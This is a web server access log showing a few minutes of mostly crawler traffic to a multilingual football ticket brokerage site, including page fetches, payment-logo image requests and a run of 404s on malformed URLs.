47.128.127.242 - - [29/Jun/2024:02:23:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.127.242 - - [29/Jun/2024:02:23:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
51.222.253.19 - - [29/Jun/2024:02:23:09 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4D046EC3-3569-AF35-BEE2-37E289C85DAB HTTP/1.1" 200 87721
121.237.36.27 - - [29/Jun/2024:02:23:33 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 -
121.237.36.27 - - [29/Jun/2024:02:23:34 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 91208
66.249.75.97 - - [29/Jun/2024:02:23:37 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/manchester_united/ HTTP/1.1" 200 87231
66.249.75.97 - - [29/Jun/2024:02:23:43 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
114.119.145.239 - - [29/Jun/2024:02:23:48 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=678E1728-8C4D-BAD2-C8F4-D5B6B5551104 HTTP/1.1" 200 86735
47.128.56.248 - - [29/Jun/2024:02:23:57 +0200] "GET /ticket2/opencms/dk/buy/?catid=64756941-02D2-3538-2077-8C2508F4A3A8&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82271
47.128.56.248 - - [29/Jun/2024:02:23:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.56.248 - - [29/Jun/2024:02:23:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.56.248 - - [29/Jun/2024:02:23:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.56.248 - - [29/Jun/2024:02:23:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.56.248 - - [29/Jun/2024:02:23:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.56.248 - - [29/Jun/2024:02:23:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.56.248 - - [29/Jun/2024:02:23:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
40.77.167.4 - - [29/Jun/2024:02:24:02 +0200] "GET /ticket2/opencms/en/sell/?edid=9A05EF4D-4376-E584-2657-07D966D7B743 HTTP/1.1" 302 -
40.77.167.4 - - [29/Jun/2024:02:24:06 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
185.157.223.150 - - [29/Jun/2024:02:24:15 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 24556651
192.99.14.159 - - [29/Jun/2024:02:24:18 +0200] "GET /ticket2/opencms/dk/robots.txt HTTP/1.1" 404 -
47.128.29.44 - - [29/Jun/2024:02:24:21 +0200] "GET /ticket2/opencms/no/buy/?edid=E9EECB41-491F-D5CF-82EE-6A187A0B45F5 HTTP/1.1" 200 72905
47.128.29.44 - - [29/Jun/2024:02:24:21 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.29.44 - - [29/Jun/2024:02:24:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.29.44 - - [29/Jun/2024:02:24:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.29.44 - - [29/Jun/2024:02:24:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.29.44 - - [29/Jun/2024:02:24:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.29.44 - - [29/Jun/2024:02:24:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.29.44 - - [29/Jun/2024:02:24:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:24:24 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8567C3FF-EEEB-6331-0D57-7F0C74A93B39&sortorder=asc&column=price HTTP/1.1" 404 -
51.222.253.2 - - [29/Jun/2024:02:24:28 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4BA78F1B-E48D-30C2-5D4F-CB6F294B5082 HTTP/1.1" 200 87718
192.99.14.159 - - [29/Jun/2024:02:24:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8567C3FF-EEEB-6331-0D57-7F0C74A93B39&sortorder=asc&column=row HTTP/1.1" 404 -
114.119.130.175 - - [29/Jun/2024:02:24:36 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=8AE4565C-F63C-2BE4-E17A-9A67140A9C9B HTTP/1.1" 200 85174
192.99.14.159 - - [29/Jun/2024:02:24:37 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=856B15A6-04F3-E784-2480-64A46DC24CE5&sortorder=asc&column=price HTTP/1.1" 404 -
66.249.76.195 - - [29/Jun/2024:02:24:38 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=3583D5C7-607A-E528-A709-844E6A72DC1B HTTP/1.1" 200 116683
192.99.14.159 - - [29/Jun/2024:02:24:44 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=856B15A6-04F3-E784-2480-64A46DC24CE5&sortorder=asc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:24:54 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=856B15A6-04F3-E784-2480-64A46DC24CE5&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.50.78 - - [29/Jun/2024:02:24:54 +0200] "GET /ticket2/opencms/fi/venue/?venueid=EEE1683D-7711-CA74-6939-E0BA59258A12 HTTP/1.1" 200 72954
47.128.50.78 - - [29/Jun/2024:02:24:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.50.78 - - [29/Jun/2024:02:24:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.50.78 - - [29/Jun/2024:02:24:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.50.78 - - [29/Jun/2024:02:24:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.50.78 - - [29/Jun/2024:02:24:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.50.78 - - [29/Jun/2024:02:24:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.50.78 - - [29/Jun/2024:02:24:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:25:09 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=85A9016D-9EFC-2EF7-D909-C2C300F655F0&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:25:17 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=86D28B23-05E4-8738-71B5-972088228AE0&sortorder=desc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:25:26 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=86D58C3C-F0C0-B63F-E2F8-CD47A83E5E88&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:25:35 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=870139C6-530A-636D-1EEE-D550E3B89162&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:25:45 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=87458B4C-5727-54F1-FD94-C447B142765E&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.127.237 - - [29/Jun/2024:02:25:50 +0200] "GET /ticket2/opencms/fi/venue/?venueid=5571DB53-176D-786E-4CB3-C9311A480A31 HTTP/1.1" 200 72905
47.128.127.237 - - [29/Jun/2024:02:25:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.127.237 - - [29/Jun/2024:02:25:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.127.237 - - [29/Jun/2024:02:25:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.127.237 - - [29/Jun/2024:02:25:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.127.237 - - [29/Jun/2024:02:25:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.127.237 - - [29/Jun/2024:02:25:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.127.237 - - [29/Jun/2024:02:25:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:25:54 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=87458B4C-5727-54F1-FD94-C447B142765E&sortorder=asc&column=section HTTP/1.1" 404 -
85.208.96.194 - - [29/Jun/2024:02:25:54 +0200] "GET /ticket2/opencms/fr/magazine/article?title=everton HTTP/1.1" 200 75028
216.245.221.83 - - [29/Jun/2024:02:25:56 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
51.222.253.7 - - [29/Jun/2024:02:25:56 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4B7EE082-3F9A-4BF2-A04C-F1720BFE9FFD HTTP/1.1" 200 85957
216.245.221.83 - - [29/Jun/2024:02:25:59 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
66.249.75.163 - - [29/Jun/2024:02:26:00 +0200] "GET /ticket2/opencms/dk/venue/?venueid=43E46141-15E1-3762-0B24-518B95D780B0 HTTP/1.1" 200 71809
192.99.14.159 - - [29/Jun/2024:02:26:02 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=87497CA6-295B-D52F-8AEC-C521C7A29E6A&sortorder=asc&column=row HTTP/1.1" 404 -
66.249.76.170 - - [29/Jun/2024:02:26:03 +0200] "GET /ticket2/opencms/it/ HTTP/1.1" 200 92916
192.99.14.159 - - [29/Jun/2024:02:26:13 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=87497CA6-295B-D52F-8AEC-C521C7A29E6A&sortorder=desc&column=price HTTP/1.1" 404 -
85.208.96.200 - - [29/Jun/2024:02:26:17 +0200] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/brighton/ HTTP/1.1" 200 83571
192.99.14.159 - - [29/Jun/2024:02:26:21 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=87764272-81EA-59CF-68F0-B30F32FF8826 HTTP/1.1" 404 -
185.191.171.8 - - [29/Jun/2024:02:26:22 +0200] "GET /ticket2/opencms/fr/magazine/article?title=crystal-palace HTTP/1.1" 200 76432
192.99.14.159 - - [29/Jun/2024:02:26:27 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=877F69A3-9CA4-792C-9F41-F6BFBD6ECFDE&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:26:34 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=877F69A3-9CA4-792C-9F41-F6BFBD6ECFDE&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.41.87 - - [29/Jun/2024:02:26:38 +0200] "GET /ticket2/opencms/fr/buy/?edid=E53C8E7A-C1C8-80DF-ED27-96FEFF6B5147 HTTP/1.1" 200 72687
47.128.41.87 - - [29/Jun/2024:02:26:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.41.87 - - [29/Jun/2024:02:26:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.41.87 - - [29/Jun/2024:02:26:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.41.87 - - [29/Jun/2024:02:26:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.41.87 - - [29/Jun/2024:02:26:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.41.87 - - [29/Jun/2024:02:26:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.41.87 - - [29/Jun/2024:02:26:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.58.145 - - [29/Jun/2024:02:26:46 +0200] "GET /ticket2/opencms/fi/venue/?countryid=9ACB31BA-4730-8A49-6A26-C927F023CAB9 HTTP/1.1" 200 102292
47.128.58.145 - - [29/Jun/2024:02:26:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
192.99.14.159 - - [29/Jun/2024:02:26:47 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=87A51714-96A1-04FD-E0F4-DE0FAA1F8DB7&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.58.145 - - [29/Jun/2024:02:26:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.58.145 - - [29/Jun/2024:02:26:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.58.145 - - [29/Jun/2024:02:26:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.58.145 - - [29/Jun/2024:02:26:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.58.145 - - [29/Jun/2024:02:26:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.58.145 - - [29/Jun/2024:02:26:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:26:56 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=87CAF22F-6B86-730F-E187-714E94ED2894&sortorder=asc&column=price HTTP/1.1" 404 -
216.244.66.238 - - [29/Jun/2024:02:27:03 +0200] "GET /ticket2/opencms/dk/no/sell/ HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:27:04 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=B3E810E8-D051-B949-4289-ACAD08512B5A HTTP/1.1" 404 -
66.249.72.33 - - [29/Jun/2024:02:27:05 +0200] "GET /ticket2/opencms/en/venue/?venueid=C8425D67-5AD6-9381-B10D-8009E1B47C0D HTTP/1.1" 200 71333
216.244.66.238 - - [29/Jun/2024:02:27:12 +0200] "GET /ticket2/opencms/sv/tickets/west_ham_united/stoke.html HTTP/1.1" 200 72520
192.99.14.159 - - [29/Jun/2024:02:27:12 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=C901ACDD-AAB8-A63E-C68A-DF59D883A51A&sortorder=desc&column=section HTTP/1.1" 404 -
185.191.171.4 - - [29/Jun/2024:02:27:18 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
185.191.171.7 - - [29/Jun/2024:02:27:19 +0200] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/brighton/ HTTP/1.1" 200 83571
190.174.39.41 - - [29/Jun/2024:02:27:19 +0200] "GET /ticket2/opencms/semalt.com/ HTTP/1.1" 404 -
51.222.253.5 - - [29/Jun/2024:02:27:25 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=3E205A07-7516-5FC3-D650-E60EBF6B7DA0 HTTP/1.1" 200 87719
111.119.201.239 - - [29/Jun/2024:02:27:25 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/bundesliga/wolfsburg/ HTTP/1.1" 200 72704
192.99.14.159 - - [29/Jun/2024:02:27:26 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=C9287498-6E1F-DBF4-4549-10442CEAA9F5&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:27:32 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=C98AE6AE-D706-49DD-E999-D5A052FE41D2&sortorder=desc&column=price HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:02:27:39 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
192.99.14.159 - - [29/Jun/2024:02:27:39 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=C9B94784-6221-79D1-BA21-8163A63BEC0D&sortorder=desc&column=section HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:02:27:39 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
47.128.121.14 - - [29/Jun/2024:02:27:42 +0200] "GET /ticket2/opencms/fi/venue/?venueid=94C483B9-56F5-43F8-EB23-31CA57E16549 HTTP/1.1" 200 72914
47.128.121.14 - - [29/Jun/2024:02:27:43 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.121.14 - - [29/Jun/2024:02:27:43 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.121.14 - - [29/Jun/2024:02:27:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.121.14 - - [29/Jun/2024:02:27:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.121.14 - - [29/Jun/2024:02:27:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.121.14 - - [29/Jun/2024:02:27:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.121.14 - - [29/Jun/2024:02:27:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:27:48 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CA409743-DF2F-20FC-E9D1-CB516B6C7577 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:27:58 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CA409743-DF2F-20FC-E9D1-CB516B6C7577&sortorder=desc&column=price HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:28:05 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CA409743-DF2F-20FC-E9D1-CB516B6C7577&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:28:17 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CA5B3DDE-EB0E-1F86-9348-5A2547011BCE&sortorder=desc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:28:28 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CA6CB9A6-B43E-D88F-C635-194118B93531&sortorder=desc&column=section HTTP/1.1" 404 -
51.222.253.9 - - [29/Jun/2024:02:28:33 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=3DBC817B-58FA-AA1C-2983-B86016C9BCF9 HTTP/1.1" 200 85957
192.99.14.159 - - [29/Jun/2024:02:28:35 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CA984D7E-3D0A-9EC2-7133-56D7DC3CD0C3&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.27.7 - - [29/Jun/2024:02:28:38 +0200] "GET /ticket2/opencms/fi/venue/?venueid=1D111B68-FF2E-F846-9D39-C347310597D3 HTTP/1.1" 200 72894
47.128.27.7 - - [29/Jun/2024:02:28:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.27.7 - - [29/Jun/2024:02:28:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.27.7 - - [29/Jun/2024:02:28:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.27.7 - - [29/Jun/2024:02:28:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.27.7 - - [29/Jun/2024:02:28:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.27.7 - - [29/Jun/2024:02:28:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.27.7 - - [29/Jun/2024:02:28:40 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
114.119.137.43 - - [29/Jun/2024:02:28:48 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=65A9D458-166A-0DC5-1B44-D817185B93FC HTTP/1.1" 200 87155
192.99.14.159 - - [29/Jun/2024:02:28:49 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CA9AAE6B-14C9-271A-740D-70C28D59704E&sortorder=desc&column=row HTTP/1.1" 404 -
47.128.49.85 - - [29/Jun/2024:02:28:56 +0200] "GET /ticket2/opencms/fr/buy/?edid=4130944B-8419-6A0B-A839-9FB45260F568 HTTP/1.1" 200 72687
192.99.14.159 - - [29/Jun/2024:02:28:56 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CAE92924-3FB7-0134-A118-0CF45131D58E HTTP/1.1" 404 -
47.128.49.85 - - [29/Jun/2024:02:28:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.49.85 - - [29/Jun/2024:02:28:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.49.85 - - [29/Jun/2024:02:28:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.49.85 - - [29/Jun/2024:02:28:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.49.85 - - [29/Jun/2024:02:28:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.49.85 - - [29/Jun/2024:02:28:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.49.85 - - [29/Jun/2024:02:28:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
192.99.14.159 - - [29/Jun/2024:02:29:05 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CAE92924-3FB7-0134-A118-0CF45131D58E&sortorder=desc&column=row HTTP/1.1" 404 -
66.249.76.1 - - [29/Jun/2024:02:29:06 +0200] "GET /ticket2/opencms/en/sell/?edid=6B1BC3D5-41D5-1130-8508-F118D3CA5AB9 HTTP/1.1" 302 -
185.191.171.1 - - [29/Jun/2024:02:29:08 +0200] "GET /ticket2/opencms/sv/magazine/article?title=chelsea-vs-tottenham-2-0 HTTP/1.1" 200 75440
66.249.75.107 - - [29/Jun/2024:02:29:08 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
192.99.14.159 - - [29/Jun/2024:02:29:11 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CAE92924-3FB7-0134-A118-0CF45131D58E&sortorder=desc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:29:18 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CAEC01E6-0D3F-6B15-E791-555064E8C8FC&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:29:25 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CB1A9388-85C2-07CC-DB47-50A8FE1A0A39&sortorder=asc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:29:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=CB1A9388-85C2-07CC-DB47-50A8FE1A0A39&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.110.12 - - [29/Jun/2024:02:29:34 +0200] "GET /ticket2/opencms/fi/venue/?venueid=BCA44AE3-0AA2-97FD-825B-60825F01067E HTTP/1.1" 200 72962
47.128.110.12 - - [29/Jun/2024:02:29:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.110.12 - - [29/Jun/2024:02:29:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.110.12 - - [29/Jun/2024:02:29:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.110.12 - - [29/Jun/2024:02:29:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
